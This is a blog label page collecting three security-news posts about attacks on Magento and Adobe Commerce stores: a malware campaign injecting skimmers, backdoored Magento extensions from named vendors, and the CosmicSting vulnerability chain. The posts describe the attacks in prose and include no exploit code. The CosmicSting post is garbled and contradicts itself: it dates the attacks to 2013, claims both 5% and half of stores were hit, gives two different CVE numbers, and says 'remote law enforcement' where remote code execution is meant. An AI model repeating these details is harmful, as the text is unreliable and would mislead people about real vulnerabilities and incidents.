Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label Adobe Commerce and Magento. Show all posts
Security Alert
Adobe Commerce and Magento CMS CyberCrime CyberThreat E-Commerce malware Security Alert

Security Alert as Malware Campaign Hits Widely Used E-commerce CMS



It has been discovered that a malicious program has been launched, posing a serious threat to thousands of online retailers worldwide, as it exploits vulnerabilities in widely used content management systems. According to security researchers, the attack primarily targets platforms that utilise open-source e-commerce CMS frameworks, such as Magento and WooCommerce, by injecting malicious code into the platform and stealing customer data, compromising checkout pages, and gaining administrative control over backend systems. 

In addition to being part of a wider cybercriminal operation, the malware is capable of silently harvesting sensitive information, such as payment details and login credentials, without the user being notified. As a result of this campaign, several online storefronts have already suffered significant losses. Cybersecurity companies, as well as digital commerce platforms, have issued urgent advisories. 

Using outdated plugins, unpatched CMS instances, and misconfigured servers, the attackers have been able to distribute the malware on an unprecedented scale. Due to the fact that e-commerce remains a lucrative target for financially motivated threat actors, this incident highlights the importance of merchants regularly updating their systems, monitoring for abnormal activity, and implementing security best practices in order to ensure that they remain secure. 

The malware campaign signals an urgent need for immediate defence action, with consumer trust and financial transactions at risk. The following sections explain how the attack mechanics work, which platforms are affected, and what mitigations should be taken to prevent this from happening in the future. 

In the ever-evolving cybercrime landscape, e-commerce platforms have become prime targets, with recent studies indicating that 32.4% of successful cyberattacks are directed at online retailers and transaction-based companies. It is no secret that the e-commerce ecosystem is under a growing number of threats, and so is the interest of malicious actors who are continually developing sophisticated methods of exploiting vulnerabilities to gain an edge over their competitors. 

Store administrators, internal employees, as well as unsuspecting customers are all susceptible to the growing range of threats facing the industry. Various attack vectors are being deployed by cybercriminals these days, including phishing attacks, credit card fraud, fake checkout pages, malicious bots, and Distributed Denial of Service (DDoS) attacks, all to disrupt operations, steal sensitive information, and compromise customer trust. 

Businesses that fail to secure their systems adequately not only suffer immediate financial losses but also long-term reputation damage and legal consequences. These threats not only result in immediate financial loss but also cause long-term reputational damage and legal consequences for businesses. It is of utmost importance that businesses take proactive and robust security measures, given that these incidents have never been more prevalent and severe. 

With comprehensive malware removal and prevention solutions from leading cybersecurity companies like Astra Security, businesses are able to detect, neutralise, and recover from breaches of this nature. Attackers are one of the most common ways that they infiltrate ecommerce websites by taking advantage of vulnerabilities within the platform, its infrastructure, or insecure third-party integrations. 

A number of breaches can be attributed to inadequate configuration management, outdated software, and weak security controls among external vendors, which are often a result of an unfortunate combination. In spite of the popularity of high-profile platforms like Magento among online retailers, cybercriminals are also looking to target these platforms—particularly in cases where security patches are delayed or misconfigured—because they present a logical target for them. 

In the past few years, cybercriminals have increasingly exploited known vulnerabilities (CVEs) in e-commerce platforms, with Adobe Magento seeing disproportionate attacks compared to other platforms. It is worth mentioning that CVE-2024-20720 has a critical command injection flaw that was discovered in early 2024, with its CVSS score of 9.1. 

In the exploitation of this vulnerability, attackers were able to execute system commands remotely without the need for user interaction. Cybercriminal groups, such as the notorious Magecart, have exploited the vulnerability for the purposes of implanting persistent backdoors and exfiltrating sensitive customer information. 

There was also the CosmicSting campaign, which exploited a chain of vulnerabilities, CVE-2024-34215 and CVE-2024-2961, which were responsible for affecting more than 75% of Adobe Commerce and Magento installations worldwide. A malicious script injected into a CMS block or CMS block modification enabled remote code execution, the access to critical configuration files (including encryption keys), the escalation of privileges, and long-term control by enabling remote code execution. 

E-commerce platforms must take proactive measures to manage vulnerabilities and monitor real-time threats as a result of CosmicSting's widespread nature and sophistication. There is a disturbing new wave of cyberattacks that specifically target e-commerce websites built on the OpenCart content management system (CMS) and are modelled after Magecart in a Magecart-style attack.

Despite the stealthy and sophisticated execution methods used in this latest incident, cybersecurity experts have been particularly attentive to it. In this attack, malicious JavaScript was injected directly into landing pages by the attackers, which were cleverly disguised by the tags of legitimate third-party marketing and analytics providers such as Google Tag Manager and Meta Pixel. 

When attackers embed malicious code within commonly used tracking snippets, they dramatically reduce their chances of traditional security tools being able to detect them early. Analysts at c/side, a cybersecurity company that specialises in client-side threat monitoring, stated that the script used in this experiment was crafted to mimic the behaviour of a typical tag, but on closer examination, it exhibited suspicious patterns. 

A very deceptive aspect of this campaign is the use of Base64 encoding for obfuscating the payload URLs, which are then routed through suspicious domains like /tagscart.shop/cdn/analytics.min.js, which conceal the script’s true intent from detection during transmission, allowing it to operate undetected in legitimate traffic flows throughout the entire process. 

After the script has been decoded, it generates new HTML elements that are then inserted into the document ahead of the existing scripts in a way that effectively launches secondary malicious payloads in the background. In order to prevent reverse engineering from occurring and to bypass basic security filters, the final stage involves heavily obfuscated JavaScript. 

It utilises techniques such as hexadecimal encoding, array manipulation, and dynamic execution via eval() that are all designed to obfuscate JavaScript. To safeguard e-commerce infrastructures, real-time script monitoring and validation mechanisms are essential to safeguarding them against the sophistication of client-side attacks, which are becoming increasingly sophisticated. 

Nowadays, with the globalisation of the internet, securing an e-commerce website has become a fundamental requirement for anyone who engages in online commerce. Whether it be through a personal website or a full-scale business, security is now an essential part of any online commerce process. 

The costs of not acting can become devastating as malware campaigns become more complex, targeting platforms like Magento, WooCommerce, OpenCart, and others. Leaving a vulnerability unchecked or using an outdated plugin can result in credit card theft, customer data breaches, ransomware, or even a complete loss of control of the site. For businesses, these actions can result in financial losses, reputational damage, legal liabilities, and the loss of customer trust, while for individual entrepreneurs, it can lead to the death of a growing business. 

Through practical, proactive strategies, these threats can be mitigated by performing regular updates and patches, developing strong access controls, integrating secure third parties with the applications, installing web application firewalls (WAFs), scanning continuously for malware, and using real-time monitoring tools. As the threat landscape evolves with each passing year, cybersecurity is not a one-time task, but rather a continuous process. 

The e-commerce industry continues to grow around the world, which means that the question is no longer whether the sit, or a competitor's will be targeted, but when. Investing in robust security measures today means more than just protecting the business; it means you'll be able to survive. Stay informed, stay current, and stay safe.

Read more »
Malware Attack
Adobe Commerce and Magento Backdoor Attacks Backdoors Cyber Attacks Extensions Global Supply-Chain Attack Magento Malicious Code Malware Attack

Magento Extension Supply Chain Attack Backdoors Hundreds of E-Commerce Sites

 

A coordinated supply chain attack has compromised between 500 and 1,000 Magento-based e-commerce websites through 21 backdoored extensions, according to new research from cybersecurity firm Sansec. The breach affected sites globally, including the one being operated by a multinational corporation valued at $40 billion.  

Sansec revealed that malicious code was injected into the extensions as far back as 2019. However, it remained inactive until April 2025, when attackers remotely activated the malware and seized control of vulnerable servers. “Multiple vendors were hacked in a coordinated supply chain attack,” Sansec reported. “Curiously, the malware was injected six years ago, but came to life this week.” 

The compromised extensions originate from well-known Magento vendors Tigren, Meetanshi, and MGS. Affected extensions include: Tigren: Ajaxsuite, Ajaxcart, Ajaxlogin, Ajaxcompare, Ajaxwishlist, MultiCOD Meetanshi: ImageClean, CookieNotice, Flatshipping, FacebookChat, CurrencySwitcher, DeferJS MGS: Lookbook, StoreLocator, Brand, GDPR, Portfolio, Popup, DeliveryTime, ProductTabs, Blog.

Additionally, a version of the Weltpixel GoogleTagManager extension was found with similar code, though Sansec could not verify whether the source was the vendor or an already-infected site. The malware was embedded in files named License.php or LicenseApi.php — components that typically manage license validation for the extensions. The backdoor listens for HTTP requests containing special parameters like requestKey and dataSign. 

When matched against hardcoded keys, it grants attackers access to admin-level functionality, including the ability to upload files. These files can then be executed through PHP’s include_once() function, opening the door for data theft, credit card skimming, admin account creation, and complete server control. Earlier variants of the backdoor didn’t require any authentication. 

However, recent versions now rely on a static key for limited protection. Sansec confirmed that this method was used to deploy a web shell on at least one client’s server. When alerted, vendor responses varied. MGS did not respond. Tigren denied any security breach and reportedly continues to distribute the compromised code. Meetanshi acknowledged a server intrusion but denied their extensions were affected. 

BleepingComputer independently verified the presence of the backdoor in the MGS StoreLocator extension, which is still available for download. Sansec recommends that any site using the listed extensions immediately conduct full server scans and review indicators of compromise. 

Ideally, websites should be restored from a verified, clean backup. The security firm also highlighted the unusual delay between the malware’s insertion and its activation, suggesting the attack was carefully planned over a long timeline. An expanded investigation is ongoing.
Read more »
Vulnerailites and Exploits
Adobe Commerce and Magento CosmicSting CyberCrime Cyberthreats Vulnerailites and Exploits

CosmicSting Exploit Targets Adobe Commerce and Magento Stores

 


In the summer of 2013, cybercriminals gained access to 5% of all Adobe Commerce and Magento stores worldwide. Large international brands have fallen victim to this attack and are among the victims. The CosmicSting attack is being conducted by seven different groups that plant malicious code on the machines of their victims. 

A new bug, dubbed CosmicSting (CVE-2024-34102), has attacked Magento and Adobe Commerce users in the past two years, causing the stores to crash. A Sansec analysis of its data has found that 3 to 5 hacks are occurring per hour in the stores. Merchants should implement these countermeasures as soon as possible to prevent this from happening to them.

In recent months, CosmicSting attacks have been affecting a large number of Adobe Commerce and Magento websites, with about five of every ten online stores being compromised by these attacks. A CosmicSting vulnerability (CVE-2024-32102) is a critical information exposure vulnerability that can be exploited remotely when combined with another vulnerability in glibc (CVE-2024-2961) that can lead to remote law enforcement. 

A vulnerability has been found within several Adobe Commerce, Magento Open Source, and Adobe Commerce Webhooks plugins that have the potential to affect their performance. The website security association Sansec reports that over 4,275 web security breaches have been reported on the web since June 2024, affecting well-known brands like Whirlpool and Ray-Ban, among others. There is still a threat associated with unpatched installations, leaving a large number of stores extremely vulnerable to cyber-attacks. 

Almost 5% of all Magento stores were infiltrated by seven financially motivated threat operations that leveraged CosmicSting to facilitate Magento cryptographic key exfiltration and payment skimmer injections against almost 5% of the stores according to an investigation conducted by Sansec. These threat operations included Belki, Bobry, Burunduki, Khomyaki, Ondatry, and Surki. In addition to Whirlpool, Segway, and Ray-Ban being believed to have remedied the issue, other companies have been urged to upgrade their Adobe Commerce and Magento implementations in the wake of the threat of the attacker escalating the attack. 

"In a report released by Sansec, the company predicts that more stores will be hacked in the coming months since its report reveals that 75% of Adobe Commerce and Magento install bases have not been patched since automated scanning of secret encryption keys began in 2012." In the short period since the flaw was discovered, it has become widely exploited by hackers, leading the U.S. Homeland Security Department (HSD) to add it to its list of Known Exploited Vulnerabilities (KEVs) in mid-July 2024, making it the fifth detection of the flaw since it was uncovered. 

The extent to which these attacks can be weaponized is that they tend to steal Magento's secret encryption key, which can then be used to generate JSON Web Tokens (JWTs) with full access to the Magento administrative API. To inject the malware into Magento, the threat actors have been observed taking advantage of the REST API available through Magento. 

The latest fix alone will not be sufficient to protect against an attack made using the latest exploit, so site owners are advised to take steps to rotate their encryption keys as an ongoing security measure. Further advances in CosmicSting were observed in August 2024, however, with the addition of CNEXT (CVE-2024-2961), a vulnerability within the icons library of the GNU C library (aka glibc), the attacker was able to achieve remote code execution by chaining these two vulnerabilities together. 

It was found that along with CNEXT (CVE-2024-2961), the CVE-2024-34102 vulnerability allows arbitrary file reading to occur on servers that are not patched. When combined, threat actors are capable of escalating to remote code execution, which can lead to an attack on the entire system. As a result of these compromises, the attackers aim to establish persistent, covert access to the computer, which is facilitated by GSocket, and insert rogue scripts that allow third parties to execute arbitrary JavaScripts in an attempt to steal payment data entered by users on the site. 

The announcement of CosmicSting, as predicted by Sansec, was accompanied by few technical details and an urgent email warning of the need to apply security updates as soon as possible - ushering in one of the biggest threats to the e-commerce ecosystem in recent years. According to the researchers, seven different threat groups use CosmicSting to compromise unpatched sites, namely, the "Bobry" group, "Polyovki" group, "Surki group," "Burunduki group," "Ondatry group," "Khomyaki group," and "Belki group." It is generally considered that these groups are financially motivated opportunists, breaking into the websites to steal credit card and customer information. 

As of 2022, Ondatry used the "TrojanOrder" flaw but has now switched to CosmicSting, which shows how some threat actors specialize in a specific area and continue to look for opportunities in easily exploitable critical vulnerabilities to stay ahead of the curve. Some threat actors are exploiting CosmicSting to steal Magento cryptographic keys, retrieve payment and billing information from the order checkout pages on Magento, and even battle each other for control of vulnerable Magento sites by injecting payment skimmers. 

This type of malicious script has the capability of injecting malicious scripts into compromised sites from domains that are named so that they appear to be well-known JavaScript libraries or analytics applications. To make the attackers appear to be the jQuery plugin, the Burundi hackers use the domain 'jgueurystatic[.]xyz' to represent jQuery. The Polyovki threat actors use the cdnstatics.net domain to make it appear as if they are running scripts to gather information about websites, such as was shown in the compromise of Ray-Ban's webpage. 

During the 2024 ComicSting mass hack, the culprits were a combination of unaware merchants and complicated mitigation mechanisms that were not properly addressed. Merchants can protect their online stores from attacks like the ComicSting exploit through proactive server-side malware detection and vulnerability monitoring tools such as Sansec’s eComscan. 

These solutions provide continuous monitoring for potential threats and unauthorized activities, helping to safeguard eCommerce platforms. Sansec has confirmed that none of its clients have been impacted by the CosmicSting exploit, highlighting the effectiveness of these preventative measures. Despite this, Sansec has issued a warning that the number of compromised stores is likely to rise in the coming months. 

The company estimates that around 75% of Adobe Commerce and Magento installations were not updated with critical patches when automated scans for secret encryption keys began. This widespread lack of security patches leaves many stores vulnerable to future attacks.
Read more »
Subscribe to: Posts (Atom)